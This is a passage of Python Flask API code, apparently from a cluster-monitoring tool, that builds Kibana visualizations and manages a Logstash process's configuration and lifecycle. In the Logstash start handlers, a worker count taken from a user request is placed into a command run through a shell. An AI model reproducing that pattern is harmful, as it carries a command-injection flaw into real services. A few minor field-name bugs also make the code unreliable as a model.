app.logger.warning('[%s] : [ERROR] Failed to create visualization with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
listOctets.append({'Failed': node})
try:
template = templateEnv.get_template(os.path.join(kbVisTemp, 'iferror.tmp'))
# print >>sys.stderr, template
except Exception as inst:
app.logger.error('[%s] : [ERROR] Template file unavailable with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Load template file unavailable'})
response.status_code = 500
return response
nodeIDName = node.split('.')[-1]
lsindex = 'logstash-*' # TODO create separate viz for more than one index
infoKBCore = {"nodeID": node, "nodeIDName": nodeIDName, "index": lsindex}
kbConf = template.render(infoKBCore)
idStr = "%s-IfError" % nodeIDName
res = ecc.pushToIndex('.kibana', 'visualization', kbConf, id=idStr)
try:
listIfError.append(res["_id"])
except Exception as inst:
app.logger.warning('[%s] : [ERROR] Failed to create visualization with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
listIfError.append({'Failed': node})
rsp['Load'] = listLoad
rsp['Memory'] = listMemory
rsp['Packets'] = listPackets
rsp['Octets'] = listOctets
rsp['IfError'] = listIfError
app.logger.info('[%s] : [INFO] Created visualizations %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(rsp))
response = jsonify(rsp)
response.status_code = 201
return response
@dmon.route('/v1/overlord/core/kb/visualizations/storm')
class KBVisualizationsStorm(Resource):
def post(self):
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
kbVisTemp = os.path.join(tmpDir, 'visualizations')
qNode = dbNodes.query.all()
qESCore = dbESCore.query.filter_by(MasterNode=1).first()
if qESCore is None:
response = jsonify({'Status': 'ES Core not registered'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] ES Core not registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if qNode is None:
response = jsonify({'Status': 'No registered nodes'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No nodes found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qSCore = dbSCore.query.first()
if qSCore is None:
response = jsonify({"Status": "No LS instances registered", "spouts": 0, "bolts": 0})
response.status_code = 500
app.logger.warning('[%s] : [WARN] No LS instance registred',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if qSCore.LSCoreStormTopology == 'None':
response = jsonify({"Status": "No Storm topology registered"})
response.status_code = 404
app.logger.info('[%s] : [INFO] No Storm topology registered, cannot fetch number of spouts and bolts',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
else:
bolts, spouts = checkStormSpoutsBolts(qSCore.LSCoreStormEndpoint, qSCore.LSCoreStormPort,
qSCore.LSCoreStormTopology)
response = jsonify({'Topology': qSCore.LSCoreStormTopology, "spouts": spouts, "bolts": bolts})
response.status_code = 200
app.logger.info('[%s] : [INFO] Storm topology %s with %s spounts and %s bolts found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qSCore.LSCoreStormTopology), str(spouts), str(bolts))
ecc = ESCoreConnector(esEndpoint=qESCore.hostIP, index='.kibana')
listStorm = []
try:
template = templateEnv.get_template(os.path.join(kbVisTemp, 'storm.tmp'))
except Exception as inst:
app.logger.error('[%s] : [ERROR] Template file unavailable with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Load template file unavailable'})
response.status_code = 500
return response
lsindex = 'logstash-*' # TODO create separate viz for more than one index
infoKBCoreStorm = {"nBolt": bolts, "nSpout": spouts, "lsindex": lsindex}
kbStorm = template.render(infoKBCoreStorm)
kbStormJ = json.loads(kbStorm)
for visualisation in kbStormJ:
res = ecc.pushToIndex('.kibana', visualisation['_type'], visualisation['_source'], id=visualisation['_id'])
try:
listStorm.append(res["_id"])
except Exception as inst:
app.logger.warning('[%s] : [ERROR] Failed to create visualization with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
listStorm.append({'Failed': visualisation})
app.logger.info('[%s] : [INFO] Generated storm visualizations: %s ',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qSCore.LSCoreStormTopology), str(listStorm))
response = jsonify({'Visualizations': listStorm})
response.status_code = 201
return response
@dmon.route('/v1/overlord/core/ls/config')
class LSCoreConfiguration(Resource):
def get(self):
if not os.path.isdir(cfgDir):
response = jsonify({'Error': 'Config dir not found !'})
response.status_code = 404
return response
if not os.path.isfile(os.path.join(cfgDir, 'logstash.conf')):
response = jsonify({'Error': 'Config file not found !'})
response.status_code = 404
return response
try:
lsCfgfile = open(os.path.join(cfgDir, 'logstash.conf'), 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
return response
return send_file(lsCfgfile, mimetype='text/plain', as_attachment=True)
@api.expect(lsCore)
def put(self):
requiredKeys = ['HostFQDN', 'ESClusterName']
if not request.json:
abort(400)
for key in requiredKeys:
if key not in request.json:
response = jsonify({'Error': 'malformed request, missing key(s)'})
response.status_code = 400
return response
qESCheck = dbESCore.query.filter_by(clusterName=request.json['ESClusterName'])
if qESCheck is None:
response = jsonify({'Status': 'Invalid cluster name: ' + request.json['ESClusterName']})
response.status_code = 404
return response
qSCore = dbSCore.query.filter_by(hostFQDN=request.json['HostFQDN']).first() #TODO: rework which kv pair is required
if 'IP' not in request.json:
hIP = '127.0.0.1'
else:
hIP = request.json['IP']
if 'OS' not in request.json:
os = "unknown"
else:
os = request.json["OS"]
if 'LSCoreHeap' not in request.json:
lsHeap = '1g'
else:
lsHeap = request.json["LSCoreHeap"]
if 'LSCoreWorkers' not in request.json:
lsWorkers = '4'
else:
lsWorkers = request.json["LSCoreWorkers"]
if 'LSCoreStormEndpoint' not in request.json:
StormEnd = 'None'
else:
StormEnd = request.json['LSCoreStormEndpoint']
if 'LSCoreStormPort' not in request.json:
StormPort = 'None'
else:
StormPort = request.json['LSCoreStormPort']
if 'LSCoreStormTopology' not in request.json:
StormTopo = 'None'
else:
StormTopo = request.json['LSCoreStormTopology']
if 'LSCoreSparkEndpoint' not in request.json:
SparkEnd = 'None'
else:
SparkEnd = request.json['LSCoreSparkEndpoint']
if 'LSCoreSparkPort' not in request.json:
SparkPort = 'None'
else:
SparkPort = request.json['LSCoreSparkPort']
if 'ESClusterName' not in request.json:
ESCname = 'diceMonit'
else:
ESCname = request.json['ESClusterName']
if 'udpPort' not in request.json:
udpPort = 25826
else:
udpPort = request.json['udpPort']
if 'LPort' not in request.json:
lumberPort = 5000
else:
lumberPort = request.json['LPort']
if 'Index' not in request.json:
rIndex = 'logstash'
else:
rIndex = request.json['Index']
if qSCore is None:
upS = dbSCore(hostFQDN=request.json["HostFQDN"], hostIP=hIP, hostOS=os,
outESclusterName=ESCname, udpPort=udpPort,
inLumberPort=lumberPort, LSCoreWorkers=lsWorkers, LSCoreHeap=lsHeap,
LSCoreStormEndpoint=StormEnd, LSCoreStormPort=StormPort, LSCoreStormTopology=StormTopo,
LSCoreSparkEndpoint=SparkEnd, LSCoreSparkPort=SparkPort, diceIndex=rIndex)
db.session.add(upS)
db.session.commit()
response = jsonify({'Added': 'LS Config for ' + request.json["HostFQDN"]})
response.status_code = 201
return response
else:
# qESCore.hostFQDN =request.json['HostFQDN'] #TODO document hostIP and FQDN may not change in README.md
if 'IP' in request.json:
qSCore.hostIP = hIP
if 'OS' in request.json:
qSCore.hostOS = os
if 'LSCoreWorkers' in request.json:
qSCore.LSCoreWorkers = lsWorkers
if 'LSCoreHeap' in request.json:
qSCore.LSCoreHeap = lsHeap
if 'ESClusterName' in request.json:
qSCore.outESclusterName = ESCname
if 'udpPort' in request.json:
qSCore.udpPort = udpPort
if 'LPort' in request.json:
qSCore.inLumberPort = lumberPort
if StormEnd != 'None':
qSCore.LSCoreStormEndpoint = StormEnd
if StormPort != 'None':
qSCore.LSCoreStormPort = StormPort
if StormTopo != 'None':
qSCore.LSCoreStormTopology = StormTopo
if SparkEnd != 'None':
qSCore.LSCoreSparkEndpoint = SparkEnd
if SparkPort != 'None':
qSCore.LSCoreSparkPort = SparkPort
if 'Index' in request.json:
qSCore.diceIndex = rIndex
db.session.commit()
response = jsonify({'Updated': 'LS config for ' + request.json["HostFQDN"]})
response.status_code = 201
return response
# return "Changes configuration fo logstash server"
@dmon.route('/v1/overlord/core/ls')
class LSCoreController(Resource):
def get(self):
hostsAll = db.session.query(dbSCore.hostFQDN, dbSCore.hostIP, dbSCore.hostOS, dbSCore.inLumberPort,
dbSCore.sslCert, dbSCore.sslKey, dbSCore.udpPort, dbSCore.outESclusterName,
dbSCore.LSCoreStatus,
dbSCore.LSCoreStormEndpoint, dbSCore.LSCoreStormPort, dbSCore.LSCoreStormTopology,
dbSCore.LSCoreSparkEndpoint, dbSCore.LSCoreSparkPort, dbSCore.LSCoreHeap, dbSCore.LSCorePID).all()
resList = []
for hosts in hostsAll:
confDict = {}
confDict['HostFQDN'] = hosts[0]
confDict['IP'] = hosts[1]
confDict['OS'] = hosts[2]
confDict['LPort'] = hosts[3]
confDict['udpPort'] = hosts[6]
confDict['ESClusterName'] = hosts[7]
confDict['LSCoreStormEndpoint'] = hosts[9]
confDict['LSCoreStormPort'] = hosts[10]
confDict['LSCoreStormTopology'] = hosts[11]
confDict['LSCoreSparkEndpoint'] = hosts[12]
confDict['LSCoreSparkPort'] = hosts[13]
if checkPID(hosts[15]):
confDict['Status'] = hosts[8]
confDict['PID'] = hosts[15]
app.logger.info('[%s] : LS Core service found at PID %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(hosts[15]))
else:
pidLSLoc = os.path.join(pidDir, 'logstash.pid')
if os.path.isfile(pidLSLoc):
esPIDf = check_proc(pidLSLoc)
if checkPID(esPIDf):
confDict['Status'] = 'detached' #TODO: Document failed message if PID is not assigned to an LS Instance
confDict['PID'] = esPIDf
app.logger.warning('[%s] : Detached LS Core service found at PID %s, setting to detached',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
esPIDf)
else:
confDict['Status'] = 'unknown' # TODO: Document failed message if PID is not assigned to an LS Instance
confDict['PID'] = 0
app.logger.warning('[%s] : LS Core service , setting to unknonw',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
confDict['LSCoreHeap'] = hosts[14]
resList.append(confDict)
response = jsonify({'LS Instances': resList})
response.status_code = 200
return response
def post(self):
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
lsTemp = os.path.join(tmpDir, 'logstash.tmp') # tmpDir+"/collectd.tmp"
lsfCore = os.path.join(cfgDir, 'logstash.conf')
# qSCore = db.session.query(dbSCore.hostFQDN).first()
qSCore = dbSCore.query.first() # TODO: currently only one LS instance supported
# return qSCore
if qSCore is None:
response = jsonify({"Status": "No LS instances registered"})
response.status_code = 500
app.logger.warning('[%s] : [WARN] No LS instance registred',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qESCore = dbESCore.query.filter_by(MasterNode=1).first() # TODO: only works with the master node
if qESCore is None:
response = jsonify({"Status": "No ES instances registered"})
response.status_code = 500
app.logger.warning('[%s] : [WARN] No ES instance registred',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if checkPID(qSCore.LSCorePID) is True:
subprocess.call(['kill', '-9', str(qSCore.LSCorePID)])
app.logger.info('[%s] : [INFO] Killed LS Instance at %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qSCore.LSCorePID))
try:
template = templateEnv.get_template(lsTemp)
# print >>sys.stderr, template
except Exception as inst:
app.logger.error('[%s] : [ERROR] LS tempalte file unavailable with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({"Status": "LS Tempalte file unavailable!"})
response.status_code = 404
return response
if qSCore.sslCert == 'default':
certLoc = os.path.join(credDir, 'logstash-forwarder.crt')
else:
certLoc = os.path.join(credDir, qSCore.sslCert + '.crt')
if qSCore.sslKey == 'default':
keyLoc = os.path.join(credDir, 'logstash-forwarder.key')
else:
keyLoc = os.path.join(credDir, qSCore.sslKey + '.key')
if qSCore.LSCoreStormEndpoint == 'None':
StormRestIP = 'None'
else:
StormRestIP = qSCore.LSCoreStormEndpoint
qNodeRoles = db.session.query(dbNodes.nRoles).all()
if qNodeRoles is None:
uniqueRolesList = ['unknown']
else:
uList = []
for r in qNodeRoles:
uList.append(r[0].split(', '))
uniqueRoles = set(x for l in uList for x in l) #TODO find better solution for finding unique roles
uniqueRolesList = list(uniqueRoles)
qMetInt =dbMetPer.query.first()
if qMetInt is None:
stormInterval = '60'
else:
stormInterval = qMetInt.stormMet
if 'storm' in uniqueRolesList:
stormStatus = 'Storm registered'
bolts, spouts = checkStormSpoutsBolts(StormRestIP, qSCore.LSCoreStormPort, qSCore.LSCoreStormTopology)
if spouts == 0 or bolts == 0:
uniqueRolesList.remove('storm')
app.logger.warning('[%s] : [WARN] Storm topology spouts and botls not found, ignoring Storm',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
stormStatus = 'Storm Ignored'
else:
stormStatus = 'Not registered'
spouts = 0
bolts = 0
app.logger.info('[%s] : [INFO] Storm Status -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), stormStatus)
qBDService = dbBDService.query.first()
if qBDService is None:
yarnHEnd = 'None'
yarnHPort = '19888'
yarnHPoll = '30'
yarnStatus = 'Not Registered'
else:
yarnHEnd = qBDService.yarnHEnd
yarnHPort = qBDService.yarnHPort
yarnHPoll = qBDService.yarnHPoll
yarnStatus = 'Registered'
app.logger.info('[%s] : [INFO] Yarn History Status -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), yarnStatus)
# appname tag is set the same for spark and yarn
qActiveApp = dbApp.query.filter_by(jobID='ACTIVE').first()
if qActiveApp is None:
app.logger.warning('[%s] : [WARN] No active applications registered tag set to default',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
appName = 'default'
else:
appName = qActiveApp.jobID
app.logger.info('[%s] : [INFO] Tag for application %s set',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), appName)
infoSCore = {"sslcert": certLoc, "sslkey": keyLoc, "udpPort": qSCore.udpPort,
"ESCluster": qSCore.outESclusterName, "EShostIP": qESCore.hostIP,
"EShostPort": qESCore.nodePort, "StormRestIP": StormRestIP,
"StormRestPort": qSCore.LSCoreStormPort, "StormTopologyID": qSCore.LSCoreStormTopology,
'storm_interval': stormInterval, 'roles': uniqueRolesList, 'myIndex': qSCore.diceIndex,
'nSpout': spouts, 'nBolt': bolts, 'yarnHEnd': yarnHEnd, 'yarnHPort': yarnHPort,
'yarnHPoll': yarnHPoll, 'appName': appName}
sConf = template.render(infoSCore)
qSCore.conf = sConf
# print >>sys.stderr, esConf
db.session.commit()
lsCoreConf = open(lsfCore, "w+")
lsCoreConf.write(sConf)
lsCoreConf.close()
os.environ['LS_HEAP_SIZE'] = os.getenv('LS_HEAP_SIZE',
qSCore.LSCoreHeap) # TODO: if heap size set in env then use it if not use db one
app.logger.info('[%s] : [INFO] LS Heap size set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(os.environ['LS_HEAP_SIZE']))
lsLogfile = os.path.join(logDir, 'logstash.log')
lsPid = 0
LSServerCmd = '/opt/logstash/bin/logstash agent -f %s -l %s -w %s' % (lsfCore, lsLogfile, qSCore.LSCoreWorkers)
try:
lsPid = subprocess.Popen(LSServerCmd, shell=True).pid
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot start LS instance with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
qSCore.LSCoreStatus = 'unknown'
qSCore.LSCorePID = lsPid
lsPIDFileLoc = os.path.join(pidDir, 'logstash.pid')
try:
lsPIDFile = open(lsPIDFileLoc, 'w+')
lsPIDFile.write(str(lsPid))
lsPIDFile.close()
except IOError:
response = jsonify({'Error': 'File I/O!'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] Cannot write LS pid file',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qSCore.LSCoreStatus = 'Running'
app.logger.info('[%s] : [INFO] LS instance started with PID %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(lsPid))
response = jsonify({'Status': 'Logstash Core PID ' + str(lsPid),
'Storm': stormStatus,
'YarnHistory': yarnStatus})
response.status_code = 200
return response
@dmon.route('/v2/overlord/core/ls')
class LSCoreControllerInit(Resource):
def post(self):
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
lsTemp = os.path.join(tmpDir, 'logstash.tmp') # tmpDir+"/collectd.tmp"
lsfCore = os.path.join(cfgDir, 'logstash.conf')
# qSCore = db.session.query(dbSCore.hostFQDN).first()
qSCore = dbSCore.query.first() # TODO: currently only one LS instance supported
# return qSCore
if qSCore is None:
response = jsonify({"Status": "No LS instances registered"})
response.status_code = 500
app.logger.warning('[%s] : [WARN] No LS instance registred',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qESCore = dbESCore.query.filter_by(MasterNode=1).first() # TODO: only works with the master node
if qESCore is None:
response = jsonify({"Status": "No ES instances registered"})
response.status_code = 500
app.logger.warning('[%s] : [WARN] No ES instance registred',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if checkPID(qSCore.LSCorePID) is True:
subprocess.call(['kill', '-9', str(qSCore.LSCorePID)])
app.logger.info('[%s] : [INFO] Killed LS Instance at %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qSCore.LSCorePID))
try:
template = templateEnv.get_template(lsTemp)
# print >>sys.stderr, template
except Exception as inst:
app.logger.error('[%s] : [ERROR] LS tempalte file unavailable with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
response = jsonify({"Status": "LS Tempalte file unavailable!"})
response.status_code = 404
return response
if qSCore.sslCert == 'default':
certLoc = os.path.join(credDir, 'logstash-forwarder.crt')
else:
certLoc = os.path.join(credDir, qSCore.sslCert + '.crt')
if qSCore.sslKey == 'default':
keyLoc = os.path.join(credDir, 'logstash-forwarder.key')
else:
keyLoc = os.path.join(credDir, qSCore.sslKey + '.key')
if qSCore.LSCoreStormEndpoint == 'None':
StormRestIP = 'None'
else:
StormRestIP = qSCore.LSCoreStormEndpoint
qNodeRoles = db.session.query(dbNodes.nRoles).all()
if qNodeRoles is None:
uniqueRolesList = ['unknown']
else:
uList = []
for r in qNodeRoles:
uList.append(r[0].split(', '))
uniqueRoles = set(x for l in uList for x in l)
uniqueRolesList = list(uniqueRoles)
qMetInt =dbMetPer.query.first()
if qMetInt is None:
stormInterval = '60'
else:
stormInterval = qMetInt.stormMet
if 'storm' in uniqueRolesList:
stormStatus = 'Storm registered'
bolts, spouts = checkStormSpoutsBolts(StormRestIP, qSCore.LSCoreStormPort, qSCore.LSCoreStormTopology)
if spouts == 0 or bolts == 0:
uniqueRolesList.remove('storm')
app.logger.warning('[%s] : [WARN] Storm topology spouts and botls not found, ignoring Storm',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
stormStatus = 'Storm ignored'
else:
stormStatus = 'Not registered'
spouts = 0
bolts = 0
app.logger.info('[%s] : [INFO] Storm Status -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), stormStatus)
qBDService = dbBDService.query.first()
if qBDService is None:
yarnHEnd = 'None'
yarnHPort = '19888'
yarnHPoll = '30'
yarnStatus = 'Not Registered'
else:
yarnHEnd = qBDService.yarnHEnd
yarnHPort = qBDService.yarnHPort
yarnHPoll = qBDService.yarnHPoll
yarnStatus = 'Registered'
app.logger.info('[%s] : [INFO] Yarn History Status -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), yarnStatus)
# appname tag is set the same for spark and yarn
qActiveApp = dbApp.query.filter_by(jobID='ACTIVE').first()
if qActiveApp is None:
app.logger.warning('[%s] : [WARN] No active applications registered tag set to default',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
appName = 'default'
else:
appName = qActiveApp.jobID
app.logger.info('[%s] : [INFO] Tag for application %s set',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), appName)
infoSCore = {"sslcert": certLoc, "sslkey": keyLoc, "udpPort": qSCore.udpPort,
"ESCluster": qSCore.outESclusterName, "EShostIP": qESCore.hostIP,
"EShostPort": qESCore.nodePort, "StormRestIP": StormRestIP,
"StormRestPort": qSCore.LSCoreStormPort, "StormTopologyID": qSCore.LSCoreStormTopology,
'storm_interval': stormInterval, 'roles': uniqueRolesList, 'myIndex': qSCore.diceIndex,
'nSpout': spouts, 'nBolt': bolts, 'yarnHEnd': yarnHEnd, 'yarnHPort': yarnHPort,
'yarnHPoll': yarnHPoll, 'appName': appName}
sConf = template.render(infoSCore)
qSCore.conf = sConf
# print >>sys.stderr, esConf
db.session.commit()
lsCoreConf = open(lsfCore, "w+")
lsCoreConf.write(sConf)
lsCoreConf.close()
os.environ['LS_HEAP_SIZE'] = os.getenv('LS_HEAP_SIZE',
qSCore.LSCoreHeap) # TODO: if heap size set in env then use it if not use db one
app.logger.info('[%s] : [INFO] LS Heap size set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(os.environ['LS_HEAP_SIZE']))
lsLogfile = os.path.join(logDir, 'logstash.log')
lsPIDFileLoc = os.path.join(pidDir, 'logstash.pid')
if os.path.isfile(lsPIDFileLoc):
lsPidf = check_proc(lsPIDFileLoc)
else:
lsPidf = 0
if lsPidf != qSCore.LSCorePID:
app.logger.warning("[%s] : [WARN] Conflicting PID values found, detached pid -> %s, attached -> %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(lsPidf),
str(qSCore.LSCorePID))
if checkPID(qSCore.LSCorePID) is True:
try:
subprocess.check_call(["service", "dmon-ls", "restart", qSCore.LSCoreHeap, qSCore.LSCoreWorkers])
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot restart LS Core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot restart LS Core'})
response.status_code = 500
return response
lsPID = check_proc(lsPIDFileLoc)
if not lsPID:
app.logger.error("[%s] : [ERROR] Can't read pidfile for ls core",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Error', 'Message': 'Cannot read lscore pid file'})
response.status_code = 500
return response
qSCore.ESCorePID = lsPID
qSCore.ESCoreStatus = 'Running'
response = jsonify({'Status': 'LS Core Restarted', 'PID': lsPID})
response.status_code = 201
return response
elif checkPID(int(lsPidf)) is True:
try:
subprocess.check_call(["service", "dmon-ls", "restart", qSCore.LSCoreHeap, qSCore.LSCoreWorkers])
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot restart detached LS Core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot restart detached LS Core'})
response.status_code = 500
return response
lsPID = check_proc(lsPIDFileLoc)
if not lsPID:
app.logger.error("[%s] : [ERROR] Can't read pidfile for ls core",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Error', 'Message': 'Cannot read ls core pid file'})
response.status_code = 500
return response
qSCore.LSCorePID = lsPID
qSCore.LSCoreStatus = 'Running'
response = jsonify({'Status': 'LS Core Restarted and attached', 'PID': lsPID})
response.status_code = 201
return response
else:
try:
subprocess.check_call(["service", "dmon-ls", "start", qSCore.LSCoreHeap, qSCore.LSCoreWorkers])
except Exception as inst:
app.logger.error("[%s] : [ERROR] Cannot start LS Core service with %s and %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst),
inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot start LS Core'})
response.status_code = 500
return response
lsPID = check_proc(lsPIDFileLoc)
if not lsPID:
app.logger.error("[%s] : [ERROR] Can't read pidfile for ls core",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Error', 'Message': 'Cannot read lscore pid file'})
response.status_code = 500
return response
qSCore.LSCorePID = lsPID
qSCore.LSCoreStatus = 'Running'
response = jsonify({'Status': 'LS Core Started', 'PID': lsPID, 'Storm': stormStatus, 'YarnHistory': yarnStatus})
response.status_code = 201
app.logger.info("[%s] : [INFO] LS Core started with PID %s, Storm %s and YanrHistory %s",
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), lsPID, stormStatus, yarnStatus)
return response
@dmon.route('/v1/overlord/core/ls/<hostFQDN>/status')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class LSCoreControllerStatus(Resource):
def get(self, hostFQDN):
qLSCoreStatus = dbSCore.query.filter_by(hostFQDN=hostFQDN).first()
if qLSCoreStatus is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
pid = qLSCoreStatus.LSCorePID
if not checkPID(pid):
if pid != 0:
qLSCoreStatus.LSCoreStatus = 'Stopped'
else:
qLSCoreStatus.LSCoreStatus = 'unknown'
response = jsonify({'Status': qLSCoreStatus.LSCoreStatus,
'PID': qLSCoreStatus.LSCorePID})
response.status_code = 200
return response
@dmon.route('/v1/overlord/core/ls/<hostFQDN>/start')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class LSCoreControllerStart(Resource):
def post(self, hostFQDN):
lsfCore = os.path.join(cfgDir, 'logstash.conf')
lsLogfile = os.path.join(logDir, 'logstash.log')
qLSCoreStart = dbSCore.query.filter_by(hostFQDN=hostFQDN).first()
if qLSCoreStart is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
if checkPID(qLSCoreStart.LSCorePID) is True:
proc = psutil.Process(qLSCoreStart.LSCorePID)
if proc.status() == psutil.STATUS_ZOMBIE:
# print >> sys.stderr, 'Process ' + str(qLSCoreStart.LSCorePID) + ' is zombie!'
app.logger.warning('[%s] : [WARN] Process %s is a zombie!',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qLSCoreStart.LSCorePID))
else:
response = jsonify({'Status': 'LS already Running',
'PID': qLSCoreStart.LSCorePID})
response.status_code = 200
return response
lsPid = 0
try:
lsPid = subprocess.Popen('/opt/logstash/bin/logstash agent -f ' + lsfCore + ' -l ' + lsLogfile + ' -w 4',
shell=True).pid
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot start ls core instance with %s and %s!',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error', 'Message': 'Cannot start LS Core service'})
response.status_code = 500
return response
# print >> sys.stderr, 'Error while starting logstash'
# print >> sys.stderr, type(inst)
# print >> sys.stderr, inst.args
qLSCoreStart.LSCorePID = lsPid
qLSCoreStart.LSCoreStatus = 'Running'
# LS core pid location
pidLSLoc = os.path.join(pidDir, 'logstash.pid')
try:
lsPIDFile = open(pidLSLoc, 'w+')
lsPIDFile.write(str(lsPid))
lsPIDFile.close()
except IOError:
response = jsonify({'Error': 'File I/O!'})
response.status_code = 500
return response
response = jsonify({'Status': 'Logstash Core PID ' + str(lsPid)})
response.status_code = 201
return response
@dmon.route('/v1/overlord/core/ls/<hostFQDN>/stop')
@api.doc(params={'hostFQDN': 'Host FQDN'})
class LSCoreControllerStop(Resource):
def post(self, hostFQDN):
qLSCoreStop = dbSCore.query.filter_by(hostFQDN=hostFQDN).first()
if qLSCoreStop is None:
response = jsonify({'Status': 'Unknown host ' + hostFQDN})
response.status_code = 404
return response
if checkPID(qLSCoreStop.LSCorePID) is True:
parent = psutil.Process(qLSCoreStop.LSCorePID)
for c in parent.children(recursive=True):
c.kill()
parent.kill()
os.kill(qLSCoreStop.LSCorePID, signal.SIGKILL)
qLSCoreStop.LSCoreStatus = 'Stopped'
response = jsonify({'Status': 'Stopped',
'Message': 'Stopped LS instance at ' + str(qLSCoreStop.LSCorePID)})
response.status_code = 200
return response
else:
qLSCoreStop.LSCoreStatus = 'unknown'
response = jsonify({'Status': 'No LS Instance Found',
'Message': 'No LS instance with PID ' + str(qLSCoreStop.LSCorePID)})
response.status_code = 404
return response
@dmon.route('/v1/overlord/core/ls/credentials')
class LSCredControl(Resource):
def get(self):
credList = []
credAll = db.session.query(dbSCore.hostFQDN, dbSCore.hostIP, dbSCore.sslCert, dbSCore.sslKey).all()
